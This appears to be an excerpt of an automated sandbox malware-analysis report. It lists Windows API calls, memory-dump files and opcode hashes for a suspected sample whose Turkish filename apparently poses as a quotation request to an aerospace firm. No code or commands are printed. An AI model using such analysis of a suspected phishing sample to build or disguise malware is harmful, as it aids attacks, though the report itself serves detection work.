                                                                                                                                      • Part of subcall function 00FC571C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                    • Opcode ID: 476683930c519bff05b60b3ad96e150aa029fed8ac33395a68b6c873c27281cc
                                                                                                                                    • Instruction ID: 75d3cf9ee324b2ca358a8578228d250ac6f0e5ed84eb53fbec72c091d78692e2
                                                                                                                                    • Opcode Fuzzy Hash: 476683930c519bff05b60b3ad96e150aa029fed8ac33395a68b6c873c27281cc
                                                                                                                                    • Instruction Fuzzy Hash: BA11E772904A13AECB312F74AD06B5D37A9AF50BF1B24452FF9489A350DE398C41B790
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00FA44CF
                                                                                                                                      • Part of subcall function 00FA407C: _memset.LIBCMT ref: 00FA40FC
                                                                                                                                      • Part of subcall function 00FA407C: _wcscpy.LIBCMT ref: 00FA4150
                                                                                                                                      • Part of subcall function 00FA407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA4160
                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00FA4524
                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA4533
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FDD4B9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1378193009-0
                                                                                                                                    • Opcode ID: 2ba4dca891086ec79bcbf9e5779ec44627da12e0745e89aeba41fb8c3a3ffab5
                                                                                                                                    • Instruction ID: 091fb3bc2e1d8989a2c0b81ad2480b8eaf486d5a7907ea03025df4f5431b2048
                                                                                                                                    • Opcode Fuzzy Hash: 2ba4dca891086ec79bcbf9e5779ec44627da12e0745e89aeba41fb8c3a3ffab5
                                                                                                                                    • Instruction Fuzzy Hash: B021F8B5D043849FE732CB248855BE6BBECAB02318F18008EE6CE56241C7B53984E741
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                                                                                      • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 01016399
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010163A4
                                                                                                                                    • _memmove.LIBCMT ref: 010163D1
                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 010163DC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1504782959-0
                                                                                                                                    • Opcode ID: 42c18067e9ce103dac91991ed1e74b0c269f72dddc329a728e61dae585d807b3
                                                                                                                                    • Instruction ID: b24b876de6b98964038d81bab4eaf4141f39a23612c10cf298408ae646200184
                                                                                                                                    • Opcode Fuzzy Hash: 42c18067e9ce103dac91991ed1e74b0c269f72dddc329a728e61dae585d807b3
                                                                                                                                    • Instruction Fuzzy Hash: EA115E7550010AAFCB00FFA4DD46DEFB7B8AF09310B144069F505A7161DF79AE04EB61
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FF8B61
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8B73
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8B89
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8BA4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 8a3ea32cabcd3242f4ce41281c6056181bcb364ccf26dd66d48feaa85481fb4c
                                                                                                                                    • Instruction ID: 6d45098d878b07ce6bd70dfac0382362ce64a3cbe925a99571578835d9abc16c
                                                                                                                                    • Opcode Fuzzy Hash: 8a3ea32cabcd3242f4ce41281c6056181bcb364ccf26dd66d48feaa85481fb4c
                                                                                                                                    • Instruction Fuzzy Hash: 87110A79901218BFDB11DFA5C885FADBB74FF48750F204095EA00B7260DA716E11EB94
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00FA12D8
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00FDB5FB
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00FDB605
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FDB610
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4127811313-0
                                                                                                                                    • Opcode ID: 10e3cbb6d98d87e72a916d56163fda3f55e99f3352b784c234a3cee04e3f19f7
                                                                                                                                    • Instruction ID: 106a220edd62adfea0cec918c504a2225776d3291cd241ba71644581aa704c0e
                                                                                                                                    • Opcode Fuzzy Hash: 10e3cbb6d98d87e72a916d56163fda3f55e99f3352b784c234a3cee04e3f19f7
                                                                                                                                    • Instruction Fuzzy Hash: 39110D75A0001AEFCB20DFA8D989AEE77F8FB0A341F510455F941E7240C735FA519BA5
                                                                                                                                    APIs
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100115F
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 01001184
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100118E
                                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 010011C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                    • Opcode ID: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
                                                                                                                                    • Instruction ID: ff3d50d47fbd63c11ac00ed91cd9f1bb9024568466fe35e16ec7e77389e50e1f
                                                                                                                                    • Opcode Fuzzy Hash: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
                                                                                                                                    • Instruction Fuzzy Hash: 97115A31C0061DE7DF159FA4D848AEEBBB8FF09751F504045EA80B2281CB359550CBD1
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FFD84D
                                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FFD864
                                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FFD879
                                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FFD897
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1352324309-0
                                                                                                                                    • Opcode ID: d8679b6aad678bdb443a79253390f8a36f824a7d4b28ab3c4f767bcaf76bbc68
                                                                                                                                    • Instruction ID: 164ef2811ac4b4602b285760be0b24c0c5ca0cd64d35d4d1d661268855c29d4d
                                                                                                                                    • Opcode Fuzzy Hash: d8679b6aad678bdb443a79253390f8a36f824a7d4b28ab3c4f767bcaf76bbc68
                                                                                                                                    • Instruction Fuzzy Hash: 17115E75606309EBE3309F50D808FA6BBBDEF00B80F208569E656D6090D7B5E549EBA1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                    • Instruction ID: efab7856542bdcbc5f6ee6ad28e5b98e25f0904309f4939d9a23e7c2cf55c7e2
                                                                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                    • Instruction Fuzzy Hash: 03014B7244824ABBCF166F84DC05CEE3F63BB18360B588456FA1858271E336D9B1BB81
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0102B2E4
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0102B2FC
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0102B320
                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0102B33B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                    • Opcode ID: c9c9bb13fcc33aa7b53f086be9616812d0af62e14802bfde2a44030cebfa26d8
                                                                                                                                    • Instruction ID: 40509005baa930f25b530997f7174a1419aa7a92fa66670fdb8510498bf5f0c6
                                                                                                                                    • Opcode Fuzzy Hash: c9c9bb13fcc33aa7b53f086be9616812d0af62e14802bfde2a44030cebfa26d8
                                                                                                                                    • Instruction Fuzzy Hash: 271144B9D0020AEFDB51DFA9C4849EEFBF9FF08210F108156E954E3614D735AA558F50
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0102B644
                                                                                                                                    • _memset.LIBCMT ref: 0102B653
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01066F20,01066F64), ref: 0102B682
                                                                                                                                    • CloseHandle.KERNEL32 ref: 0102B694
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3277943733-0
                                                                                                                                    • Opcode ID: db1ca7019ab2bc27b56d5e5734bf80dcdd2025432b7ebb2fbb70ac9c13b6162c
                                                                                                                                    • Instruction ID: 8e39ca2223a3c760753a1ede79492782288d192eeea404c32e31761efb1a2caf
                                                                                                                                    • Opcode Fuzzy Hash: db1ca7019ab2bc27b56d5e5734bf80dcdd2025432b7ebb2fbb70ac9c13b6162c
                                                                                                                                    • Instruction Fuzzy Hash: 1EF082B25403017BF2302B65AC16FBB3A9CEB18395F804020FA89E5196DBBB4C0097A8
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 01006BE6
                                                                                                                                      • Part of subcall function 010076C4: _memset.LIBCMT ref: 010076F9
                                                                                                                                    • _memmove.LIBCMT ref: 01006C09
                                                                                                                                    • _memset.LIBCMT ref: 01006C16
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 01006C26
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 48991266-0
                                                                                                                                    • Opcode ID: 34c47665eb2da01d08444c15e6e9d2eff14a944577a814a55ecbd777f9ce368a
                                                                                                                                    • Instruction ID: 2d4629ed3d6a344022bf07ae58543245c1337d648528c46f04296a0d0bc13239
                                                                                                                                    • Opcode Fuzzy Hash: 34c47665eb2da01d08444c15e6e9d2eff14a944577a814a55ecbd777f9ce368a
                                                                                                                                    • Instruction Fuzzy Hash: 7AF0543A100101ABCF126F95DC85E8ABB29EF56360F04C055FE499E25ACB35E811DBB4
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FA134D
                                                                                                                                      • Part of subcall function 00FA12F3: SelectObject.GDI32(?,00000000), ref: 00FA135C
                                                                                                                                      • Part of subcall function 00FA12F3: BeginPath.GDI32(?), ref: 00FA1373
                                                                                                                                      • Part of subcall function 00FA12F3: SelectObject.GDI32(?,00000000), ref: 00FA139C
                                                                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0102BD40
                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 0102BD4D
                                                                                                                                    • EndPath.GDI32(00000000), ref: 0102BD5D
                                                                                                                                    • StrokePath.GDI32(00000000), ref: 0102BD6B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                    • Opcode ID: cec0c74a99aa5ab3ef592e11a780cb02e65d6de64edeecd47a240852acb05be1
                                                                                                                                    • Instruction ID: 841802188c55f453ebc0130276319a9f9a68f3bcaf3b550fe3cbc5f31240f156
                                                                                                                                    • Opcode Fuzzy Hash: cec0c74a99aa5ab3ef592e11a780cb02e65d6de64edeecd47a240852acb05be1
                                                                                                                                    • Instruction Fuzzy Hash: 29F0823100126ABBDB326F54AC09FCE3FA9AF06751F244140FA91610D58B7E5561DFA9
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00FA2231
                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00FA223B
                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00FA2250
                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00FA2258
                                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 00FDBE83
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FDBE90
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00FDBEA9
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00FDBEC2
                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00FDBEE2
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00FDBEED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1946975507-0
                                                                                                                                    • Opcode ID: 89200bf259765f48eb4c00baeb3a288fb46bf8727a7c5d9680d75a5c8476b40f
                                                                                                                                    • Instruction ID: c1467d2467fd6e4925a4ad42400969be147f366ac7ddf285217aae1efc7faa05
                                                                                                                                    • Opcode Fuzzy Hash: 89200bf259765f48eb4c00baeb3a288fb46bf8727a7c5d9680d75a5c8476b40f
                                                                                                                                    • Instruction Fuzzy Hash: FCE06531504145AADF315F64FC0DBD83F21EB06332F248356FFA9480D587764580EB11
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00FF871B
                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FF82E6), ref: 00FF8722
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FF82E6), ref: 00FF872F
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FF82E6), ref: 00FF8736
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3974789173-0
